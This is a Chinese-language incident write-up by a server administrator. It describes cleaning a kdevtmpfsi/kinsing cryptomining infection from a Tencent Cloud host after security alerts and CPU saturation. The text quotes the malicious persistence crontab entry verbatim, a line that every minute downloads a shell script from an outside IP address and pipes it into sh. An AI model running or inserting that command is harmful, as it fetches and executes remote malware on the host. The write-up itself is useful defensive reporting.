首次感知是云服务器报警短信
【腾讯云】尊敬的腾讯云用户,您好!您的腾讯云时间:2023-06-02 15:08:50(GMT+8:00),
检测到存在待处理的恶意文件:/tmp/kdevtmpfsi,威胁等级:严重,您的服务器疑似被黑客入侵,
建议您及时确认,避免造成严重损失,请前往主机安全
【腾讯云】尊敬的腾讯云用户,您好!您的腾讯云时间:2023-06-02 15:03:58(GMT+8:00),
检测到存在待处理的恶意文件:/etc/libsystem.so,威胁等级:严重,您的服务器疑似被黑客入侵,
建议您及时确认,避免造成严重损失,请前往主机安全
【腾讯云】尊敬的腾讯云用户,您好!您的腾讯云时间:2023-06-02 15:04:02(GMT+8:00),
检测到存在待处理的恶意文件:/etc/kinsing,威胁等级:严重,您的服务器疑似被黑客入侵,
建议您及时确认,避免造成严重损失,请前往主机安全
使用远程登录工具和本地ssh命令已经无法链接该服务器,只能到腾讯云平台在web页登录,同时在页面看到 CPU已经彪到100%。登录到服务器后开始检查数据库数据,发现并没有被破坏,然后开始清理病毒,先使用top命令看到这个进程,然后将其kill掉,然后再去/etc/文件下找到了异常文件libsystem.so和kinsing,将其删除。起初以为如此就完事了,然而并没有
30559 root 20 0 3075912 6360 0 S 374.1 0.1 22:52.79 kdevtmpfsi
29056 root 20 0 4773936 1.0g 3696 S 22.3 13.4 867:06.86 java
15304 root 20 0 7591136 1.2g 3036 S 1.0 15.7 263:42.45 java
9062 root 20 0 51792 6416 2984 S 0.7 0.1 16:03.46 tat_agent
20425 root 20 0 985464 43048 10156 S 0.7 0.5 53:27.58 YDService
4768 root 20 0 161972 2208 1564 R 0.3 0.0 0:00.03 top
30223 root 20 0 5873268 584972 4296 S 0.3 7.4 20:22.76 java
1 root 20 0 191056 3620 2136 S 0.0 0.0 14:48.49 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:04.28 kthreadd
4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H
6 root 20 0 0 0 0 S 0.0 0.0 1:11.17 ksoftirqd/0
7 root rt 0 0 0 0 S 0.0 0.0 0:33.11 migration/0
没一会儿的功夫的,监控发现cpu又打满了100%,然后我又开始重复的步骤,杀进程删文件,看来这个病毒并没有这么容易解决。
明明之中感觉到这个应该是有个定时任务在控制病毒文件的下载和执行,于是在linux服务器使用crontab -l 命令查到了一个异常的定时任务
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
一看就是在偷偷下载不怀好意的脚本文件,确定了这个ip不是我们机器,然后果断删除这个定时任务,然后又重复杀掉kdevtmpfsi进程,删除相关文件夹,机器终于恢复了正常。